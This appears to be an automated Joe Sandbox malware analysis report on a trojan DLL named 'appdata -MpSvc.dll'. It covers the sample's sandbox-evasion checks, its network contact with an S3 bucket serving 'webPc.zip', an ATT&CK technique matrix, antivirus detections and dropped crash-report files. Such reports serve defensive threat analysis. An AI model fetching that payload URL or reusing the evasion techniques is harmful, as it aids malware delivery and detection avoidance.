Source: Amcache.hve.8.drBinary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.8.drBinary or memory string: vmci.syshbin
Source: Amcache.hve.8.drBinary or memory string: VMware, Inc.
Source: Amcache.hve.8.drBinary or memory string: VMware20,1hbin@
Source: Amcache.hve.8.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.8.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.8.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: rundll32.exe, 0000000C.00000002.2473936771.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.2118014751.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW3
Source: rundll32.exe, 0000000C.00000002.2473936771.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.2118014751.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: Amcache.hve.8.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.8.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.8.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.8.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.8.drBinary or memory string: vmci.sys
Source: Amcache.hve.8.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.8.drBinary or memory string: vmci.syshbin`
Source: Amcache.hve.8.drBinary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.8.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.8.drBinary or memory string: VMware20,1
Source: Amcache.hve.8.drBinary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.8.drBinary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.8.drBinary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.8.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.8.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.8.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.8.drBinary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.8.drBinary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.8.drBinary or memory string: VMware Virtual RAM
Source: Amcache.hve.8.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: rundll32.exe, 0000000C.00000003.2118014751.0000000002A32000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.2473936771.0000000002A32000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWHK
Source: Amcache.hve.8.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_4-9224
Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_13-12559
Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_14-9225
Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_15-9217
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 3.5.234.32 443Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_046021C4 ShellExecuteW,12_2_046021C4
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\appdata -MpSvc.dll",#1Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04A48AC4 cpuid 4_2_04A48AC4
Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetUserDefaultUILanguage,GetLocaleInfoW,4_2_04A4E6DC
Source: C:\Windows\SysWOW64\rundll32.exeCode function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,4_2_04A4DB7C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetUserDefaultUILanguage,GetLocaleInfoW,12_2_043CE6DC
Source: C:\Windows\SysWOW64\rundll32.exeCode function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,12_2_043CDB7C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetUserDefaultUILanguage,GetLocaleInfoW,13_2_03FFE6DC
Source: C:\Windows\SysWOW64\rundll32.exeCode function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,13_2_03FFDB7C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetUserDefaultUILanguage,GetLocaleInfoW,14_2_0494E6DC
Source: C:\Windows\SysWOW64\rundll32.exeCode function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,14_2_0494DB7C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetUserDefaultUILanguage,GetLocaleInfoW,15_2_04D4E6DC
Source: C:\Windows\SysWOW64\rundll32.exeCode function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,15_2_04D4DB7C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04A50308 GetVersion,4_2_04A50308
Source: Amcache.hve.8.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.8.drBinary or memory string: msmpeng.exe
Source: Amcache.hve.8.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.8.drBinary or memory string: MsMpEng.exe
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Native API
1
DLL Side-Loading
1
Exploitation for Privilege Escalation
1
Masquerading
OS Credential Dumping21
Security Software Discovery
Remote Services1
Archive Collected Data
11
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts111
Process Injection
11
Virtualization/Sandbox Evasion
LSASS Memory11
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media4
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
DLL Side-Loading
111
Process Injection
Security Account Manager1
Account Discovery
SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information
NTDS1
Application Window Discovery
Distributed Component Object ModelInput Capture14
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Rundll32
LSA Secrets1
File and Directory Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading
Cached Domain Credentials23
System Information Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1405581 Sample: appdata -MpSvc.dll Startdate: 08/03/2024 Architecture: WINDOWS Score: 72 31 s3-r-w.sa-east-1.amazonaws.com 2->31 33 awsserver903203232.s3.sa-east-1.amazonaws.com 2->33 37 Antivirus / Scanner detection for submitted sample 2->37 39 Multi AV Scanner detection for submitted file 2->39 41 Machine Learning detection for sample 2->41 9 loaddll32.exe 1 2->9         started        signatures3 process4 process5 11 rundll32.exe 13 9->11         started        15 rundll32.exe 9->15         started        17 cmd.exe 1 9->17         started        19 7 other processes 9->19 dnsIp6 35 s3-r-w.sa-east-1.amazonaws.com 3.5.234.32, 443, 49716 AMAZON-02US United States 11->35 43 System process connects to network (likely due to code injection or exploit) 11->43 21 WerFault.exe 11->21         started        45 Found evasive API chain checking for user administrative privileges 15->45 23 rundll32.exe 17->23         started        25 WerFault.exe 16 19->25         started        27 WerFault.exe 16 19->27         started        signatures7 process8 process9 29 WerFault.exe 20 16 23->29         started       

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
appdata -MpSvc.dll47%ReversingLabsWin32.Trojan.Generic
appdata -MpSvc.dll100%AviraHEUR/AGEN.1338333
appdata -MpSvc.dll100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
s3-r-w.sa-east-1.amazonaws.com
3.5.234.32
truefalse
    high
    awsserver903203232.s3.sa-east-1.amazonaws.com
    unknown
    unknownfalse
      high
      NameMaliciousAntivirus DetectionReputation
      https://awsserver903203232.s3.sa-east-1.amazonaws.com/webPc.zipfalse
        high
        NameSourceMaliciousAntivirus DetectionReputation
        https://awsserver903203232.s3.sa-east-1.amazonaws.com/rundll32.exe, 0000000C.00000003.2118014751.0000000002A32000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.2473936771.0000000002A32000.00000004.00000020.00020000.00000000.sdmpfalse
          high
          https://awsserver903203232.s3.sa-east-1.amazonaws.com/webPc.zip2xnLrundll32.exe, 0000000C.00000002.2473936771.0000000002A65000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.2118014751.0000000002A65000.00000004.00000020.00020000.00000000.sdmpfalse
            high
            http://upx.sf.netAmcache.hve.8.drfalse
              high
              https://awsserver903203232.s3.sa-east-1.amazonaws.com/Prundll32.exe, 0000000C.00000003.2118014751.0000000002A32000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.2473936771.0000000002A32000.00000004.00000020.00020000.00000000.sdmpfalse
                high
                https://awsserver903203232.s3.sa-east-1.amazonaws.com/webPc.zipvxrundll32.exe, 0000000C.00000002.2473936771.0000000002A65000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.2118014751.0000000002A65000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  http://www.delphiforfun.org/openUrundll32.exe, 00000004.00000002.2463756119.0000000004A5C000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000C.00000002.2474320110.00000000043DC000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000D.00000002.3859788011.000000000400C000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2470563916.000000000495C000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.2473864925.0000000004D5C000.00000020.00000001.01000000.00000003.sdmp, appdata -MpSvc.dllfalse
                    high
                    https://awsserver903203232.s3.sa-east-1.amazonaws.com/webPc.zip4Grundll32.exe, 0000000C.00000002.2473936771.0000000002A65000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.2118014751.0000000002A65000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      https://awsserver903203232.s3.sa-east-1.amazonaws.com/webPc.zipkrundll32.exe, 0000000C.00000002.2473936771.0000000002A1E000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        http://www.delphiforfun.org/rundll32.exefalse
                          high
                          https://awsserver903203232.s3.sa-east-1.amazonaws.com/webPc.zip94RMrundll32.exe, 0000000C.00000003.2118014751.0000000002A32000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.2473936771.0000000002A32000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            3.5.234.32
                            s3-r-w.sa-east-1.amazonaws.comUnited States
                            16509AMAZON-02USfalse
                            Joe Sandbox version:40.0.0 Tourmaline
                            Analysis ID:1405581
                            Start date and time:2024-03-08 19:50:57 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 9m 11s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Run name:Run with higher sleep bypass
                            Number of analysed new started processes analysed:25
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:appdata -MpSvc.dll
                            Detection:MAL
                            Classification:mal72.evad.winDLL@26/16@1/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:Failed
                            Cookbook Comments:
                            • Found application associated with file extension: .dll
                            • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                            • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                            • Excluded IPs from analysis (whitelisted): 20.42.65.92
                            • Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • VT rate limit hit for: appdata -MpSvc.dll
                            No simulations
                            No context
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            s3-r-w.sa-east-1.amazonaws.com00023948209303294#U00ac320302282349843984903.exeGet hashmaliciousUnknownBrowse
                            • 3.5.232.137
                            00023948209303294#U00ac320302282349843984903.exeGet hashmaliciousUnknownBrowse
                            • 16.12.1.14
                            0219830219301290321012notas.exeGet hashmaliciousUnknownBrowse
                            • 3.5.232.21
                            0219830219301290321012notas.exeGet hashmaliciousUnknownBrowse
                            • 3.5.234.1
                            0923840932020004-3-0.exeGet hashmaliciousUnknownBrowse
                            • 3.5.232.185
                            WKYC506_2389030007-00901003007010_777380775_#U00b2.exeGet hashmaliciousUnknownBrowse
                            • 52.95.163.114
                            WKYC506_2389030007-00901003007010_777380775_#U00b2.exeGet hashmaliciousUnknownBrowse
                            • 16.12.0.34
                            DOC7186723912#U0370.msiGet hashmaliciousHidden Macro 4.0Browse
                            • 52.95.164.60
                            DOC0974045396#U0370.msiGet hashmaliciousHidden Macro 4.0Browse
                            • 52.95.164.98
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            AMAZON-02USsaoJLnjLcC.elfGet hashmaliciousUnknownBrowse
                            • 34.249.145.219
                            ZAYIMfNGS6.elfGet hashmaliciousUnknownBrowse
                            • 34.249.145.219
                            j9JVfEt8Il.elfGet hashmaliciousUnknownBrowse
                            • 34.254.182.186
                            http://mydpd.space/Get hashmaliciousDCRat, PureLog StealerBrowse
                            • 99.84.203.3
                            https://www.hiclipart.com/free-transparent-background-png-clipart-zjdjz/downloadGet hashmaliciousUnknownBrowse
                            • 13.226.225.59
                            http://67833.vipGet hashmaliciousPhisherBrowse
                            • 18.244.214.32
                            FW Attention New Incoming D0CS for Live-quinn on.emlGet hashmaliciousHTMLPhisherBrowse
                            • 52.43.182.179
                            https://www.trade-schools-directory.com/redir/coquredir.htm?page=college&type=popular&pos=82&dest=//gamma.app/public/This-project-proposal-aims-to-address-the-challenges-and-deliver--4tlhyfwlb1pvqx4Get hashmaliciousUnknownBrowse
                            • 3.132.246.63
                            https://www.trade-schools-directory.com/redir/coquredir.htm?page=college&type=popular&pos=82&dest=//gamma.app/public/This-project-proposal-aims-to-address-the-challenges-and-deliver--4tlhyfwlb1pvqx4Get hashmaliciousUnknownBrowse
                            • 13.226.210.22
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            37f463bf4616ecd445d4a1937da06e19http://mydpd.space/Get hashmaliciousDCRat, PureLog StealerBrowse
                            • 3.5.234.32
                            https://www.hiclipart.com/free-transparent-background-png-clipart-zjdjz/downloadGet hashmaliciousUnknownBrowse
                            • 3.5.234.32
                            Kontrolforanstaltningens31.wsfGet hashmaliciousGuLoader, XWormBrowse
                            • 3.5.234.32
                            file.exeGet hashmaliciousClipboard Hijacker, RisePro StealerBrowse
                            • 3.5.234.32
                            SecuriteInfo.com.Win32.PWSX-gen.10639.26376.exeGet hashmaliciousAgentTeslaBrowse
                            • 3.5.234.32
                            20240306 The new order about PO#PW225084YL.50L of 23AW1203A285 2ND SAMPLE ENR xls.bat.exeGet hashmaliciousGuLoaderBrowse
                            • 3.5.234.32
                            Re Remittance Advice.exeGet hashmaliciousAgentTeslaBrowse
                            • 3.5.234.32
                            PO 02-2311-55R-MAP- 7Mar2024-19th Order-Euro38217- URGENT ORDER solutions -RK.exeGet hashmaliciousAgentTeslaBrowse
                            • 3.5.234.32
                            SecuriteInfo.com.Unwanted-Program.0056626f1.515.26855.exeGet hashmaliciousUnknownBrowse
                            • 3.5.234.32
                            No context
                            Process:C:\Windows\SysWOW64\WerFault.exe
                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):1.1521242973881267
                            Encrypted:false
                            SSDEEP:192:2U7yiLOL/gb0BU/wjeT8xmA3fzuiFFZ24IO8dci:9yiSTgoBU/wjeyfzuiFFY4IO8dci
                            MD5:9729AA6095E3FD89B826B8E8B86D6AF0
                            SHA1:7FF54350D57D6543A0DEAA8533F18CBA9C19D3C1
                            SHA-256:E6BBE1DCE64B68E3F8A5BE45AA7FF82DA8C6E7EA5B09FE036A739BE15F7B8547
                            SHA-512:BE52C98284224FB48BEAE3724947D08A4C78406EC46DA742953D14206E887BF9835431A043980869335CD972258DD32EB790FDCE98C848F2E7A74F00602E51C4
                            Malicious:false
                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.4.3.9.7.5.1.5.3.8.5.4.8.2.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.4.3.9.7.5.1.6.2.1.3.5.8.5.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.3.1.9.2.e.d.2.-.e.1.4.4.-.4.4.e.2.-.8.f.b.3.-.6.9.6.0.7.5.a.b.3.6.b.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.f.f.b.3.8.5.f.-.d.9.3.e.-.4.c.b.d.-.8.b.b.2.-.2.a.3.4.0.7.2.e.4.f.e.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.6.4.-.0.0.0.1.-.0.0.1.4.-.d.4.0.d.-.3.4.a.f.8.9.7.1.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.8.f.a.8.8.9.e.4.5.6.a.a.6.4.6.a.4.d.0.a.4.3.4.9.9.7.7.4.3.0.c.e.5.f.a.5.e.
                            Process:C:\Windows\SysWOW64\WerFault.exe
                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):0.917538838644404
                            Encrypted:false
                            SSDEEP:192:dmDifONL20BU/wjeTwnQzuiFFZ24IO84ci:EDiGNLdBU/wje7zuiFFY4IO84ci
                            MD5:DDEEB88F71C9BCC13371CA61C389737C
                            SHA1:E360C321ACAF3EFEB96720FE273371F7EC2EDB1E
                            SHA-256:9557714007841A4EF66423EF5AAB2BF084D908EC7047E000C94C6175F09206D7
                            SHA-512:6A864C579FB5D8C777EC075B789F8DA2F9626E0BC4122E102E120A242FA1711BCD8D0FF37F8327A825279BED17CF5D4757614D386EFD46BC34DFD422DF07AE0D
                            Malicious:false
                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.4.3.9.7.5.0.3.9.4.7.0.5.0.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.4.3.9.7.5.0.4.7.9.0.8.0.6.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.a.5.3.d.9.1.2.-.3.d.b.9.-.4.6.1.a.-.b.3.b.4.-.f.4.e.d.8.d.c.9.9.e.1.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.2.9.8.b.d.e.d.-.b.a.c.7.-.4.b.8.5.-.a.5.d.1.-.5.a.4.1.a.2.a.2.3.9.6.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.a.4.-.0.0.0.1.-.0.0.1.4.-.b.e.0.b.-.c.4.a.9.8.9.7.1.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.8.f.a.8.8.9.e.4.5.6.a.a.6.4.6.a.4.d.0.a.4.3.4.9.9.7.7.4.3.0.c.e.5.f.a.5.e.2.d.7.!.r.
                            Process:C:\Windows\SysWOW64\WerFault.exe
                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):0.9170449241382006
                            Encrypted:false
                            SSDEEP:192:iu7iInOKL20BU/wjeTtIwzuiFFZ24IO84ci:xixKLdBU/wje7zuiFFY4IO84ci
                            MD5:C25020C4CD2F8F06A442323EAFC4634E
                            SHA1:BC8AF848D39FA0BE6C96BDBAC1354A47848F1CFF
                            SHA-256:5C1C39C75891D0D65177488208413AABE51581D6DC03D447CF348457DCFF2489
                            SHA-512:BD91786731C9476B49DCEF10B44C365508BEA5F3CE1C15678BBA77C7DD39A31A70FBB55FDE65948F9D3962365F272BC95E2D27B147A379BB80F6F5040DE5390A
                            Malicious:false
                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.4.3.9.7.5.1.3.0.5.2.6.4.7.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.4.3.9.7.5.1.3.9.9.0.1.5.3.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.7.5.3.d.a.2.e.-.c.7.1.6.-.4.9.9.8.-.a.4.4.f.-.d.2.5.b.c.0.c.9.6.2.b.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.9.5.0.e.7.f.7.-.a.c.d.9.-.4.3.7.b.-.a.8.3.9.-.a.5.2.3.f.2.3.3.b.4.2.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.8.4.-.0.0.0.1.-.0.0.1.4.-.2.1.3.0.-.4.2.a.f.8.9.7.1.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.8.f.a.8.8.9.e.4.5.6.a.a.6.4.6.a.4.d.0.a.4.3.4.9.9.7.7.4.3.0.c.e.5.f.a.5.e.2.d.7.!.r.
                            Process:C:\Windows\SysWOW64\WerFault.exe
                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):0.9116363980528673
                            Encrypted:false
                            SSDEEP:192:ybvDFmUiLOA7tw0BU/wjeTtIwzuiFFZ24IO8dci:QvDwUiSstLBU/wje7zuiFFY4IO8dci
                            MD5:310DA430D1F8B3373D482F9F96749F86
                            SHA1:840AB1B59772664B1CB039D8F124CFBDEC76D848
                            SHA-256:E6204D251F192BB0096ACD0E323279D8803C50002782BD7B177D2BC0E2F8793C
                            SHA-512:3A994ED02B8F69267E2396576F215BE21068425FFFA7639408A91EBB0271FAC961C199D275B5BE565FA35EB4D8CC6401E766C0B9595971017140875BF996CAF9
                            Malicious:false
